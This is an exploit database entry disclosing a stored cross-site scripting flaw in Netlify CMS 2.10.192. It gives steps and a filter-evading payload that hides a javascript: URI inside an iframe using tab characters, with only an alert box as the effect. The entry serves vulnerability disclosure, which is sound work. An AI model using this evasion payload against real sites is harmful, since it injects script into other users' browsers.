Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Author: tmrswrr
type: webapps
platform: java
port:
date_added: 2023-07-11
date_updated: 2023-07-15
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51576.txt
# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com


Description:

1. Go to new post and write body field your payload:

https://cms-demo.netlify.com/#/collections/posts

Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>

2. After save it XSS payload will executed and see alert box
Copyright © 2024 Irfan TOOR all rights reserved.